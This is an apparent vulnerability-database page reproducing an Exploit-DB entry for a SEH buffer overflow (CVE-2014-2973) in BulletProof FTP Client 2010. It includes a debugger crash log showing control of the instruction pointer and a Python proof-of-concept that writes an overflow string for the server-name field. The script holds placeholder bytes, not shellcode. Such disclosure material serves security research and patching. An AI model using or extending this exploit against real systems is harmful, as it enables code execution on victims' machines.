BulletProof FTP Client 2010 - Buffer Overflow (SEH)

vendor:

BulletProof FTP Client

by:

Gabor Seljan

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BulletProof FTP Client

Affected Version From: 2010.75.0.76

Affected Version To: 2010.75.0.76

Patch Exists: YES

Related CWE: CVE-2014-2973

CPE: a:bpftp:bulletproof_ftp_client

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2014

BulletProof FTP Client 2010 – Buffer Overflow (SEH)

A buffer overflow vulnerability exists in BulletProof FTP Client 2010, which could allow an attacker to execute arbitrary code on the target system. The vulnerability is due to a boundary error when handling user-supplied input. An attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable application. Successful exploitation could result in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of BulletProof FTP Client 2010 or apply the patch from the vendor.

Source

Exploit-DB raw data:

#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)          #
# Date: Jul 24 2014                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.bpftp.com/                                        #
# Version: 2010.75.0.76                                                       #
# Tested on: Windows XP SP3                                                   #
# CVE: CVE-2014-2973                                                          #
#-----------------------------------------------------------------------------#

'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for bpftpclient.exe -
bpftpclient+0x1c005b:
005c005b f6431c10        test    byte ptr [ebx+1Ch],10h     ds:0023:4141415d=??
0:000> !exchain
0012f59c: bpftpclient+1c044e (005c044e)
0012f5a8: bpftpclient+1c046b (005c046b)
0012f618: 43434343
Invalid exception stack at 42424242
0:000> g
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
43434343 ??              ???
'''

#!/usr/bin/python

junk1 = b'\x41' * 89
nSEH  = b'\x42' * 4
SEH   = b'\x43' * 4
junk2 = b'\x44' * 1000

sploit = junk1 + nSEH + SEH + junk2

try:
  print('[+] Creating exploit file...')
  f = open('sploit.txt', 'wb')
  f.write(sploit)
  f.close()
  print('[+] Exploit file created successfully!')
except:
  print('[!] Error while creating exploit file!')

print('[+] Use the following as Server Name/IP with any user\'s credentials!')
print(sploit.decode())

##EDB Note: You can also enter the contents of the file in the "Enter URL" to cause this crash.